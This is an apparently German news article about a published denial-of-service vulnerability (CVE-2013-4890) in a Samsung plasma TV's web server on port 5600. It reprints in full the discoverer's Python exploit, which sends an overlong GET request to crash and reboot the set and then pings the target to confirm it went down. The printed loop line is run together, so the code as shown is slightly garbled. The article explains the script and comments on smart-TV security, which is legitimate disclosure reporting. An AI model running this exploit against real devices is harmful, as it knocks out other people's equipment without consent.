Eine Sicherheitslücke in dem Samsung-Fernsehgerät Modell PS50C7700 hat zur Folge, dass ein entfernter Angreifer Denial-of-Service-Attacken durchführen kann. Damit ist er in der Lage, den Fernseher zum Absturz zu bringen und zu rebooten. Die Attacke ist durch das Senden spezieller Daten an den TCP-Port 5600 möglich.

Die Schwachstelle wurde von Malik Mesellem von ITsecgames entdeckt und veröffentlicht. Er stellt auch einen einfachen in Python geschriebenen Exploit zur Verfügung, der die Lücke demonstriert:

#!/usr/bin/python
# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com
# Date: 07/21/2013
# CVE Number: CVE-2013-4890
# Vendor Homepage: http://www.samsung.com
# Description:
# The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request
# As a results, the TV reboots...
# Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :)
import httplib
import sys
import os
print " ***************************************************************************************"
print " Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com\n"
print " Exploit: Denial of Service (DoS) attack\n"
print " Description:\n"
print " The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request."
print " Tested successfully on my Samsung PS50C7700 plasma TV :)\n"
print " ***************************************************************************************\n"
# Sends the payload
print " Sending the malicious payload...\n"
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()
# Checks the response
print " Checking the status... (CTRL+Z to stop)\n"
response = 0
while response == 0: response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1") if response != 0: print " Target down!\n"

Dieser Exploit baut eine TCP-Verbidnung auf Port 5600 zum Webserver (DMCRUIS/0.1) auf und sendet eine sehr lange Anfrage an diesen. Dieser Schritt ist via Httplib in Form einer sehr langen HTTP-GET-Anfrage realisiert. Das heißt, der eigentliche Exploit ist nur drei Zeilen lang. Nach dem Senden der Payload prüft das Script mittels einer “ping”-Schleife, ob der Server noch antwortet. Falls nicht, war die Attacke erfolgreich und das Gerät wurde durch die Attacke zum Absturz gebracht.

Dieser Sicherheitslücke zeigt, wie einfach Attacken gegen SmartTVs derzeit sind.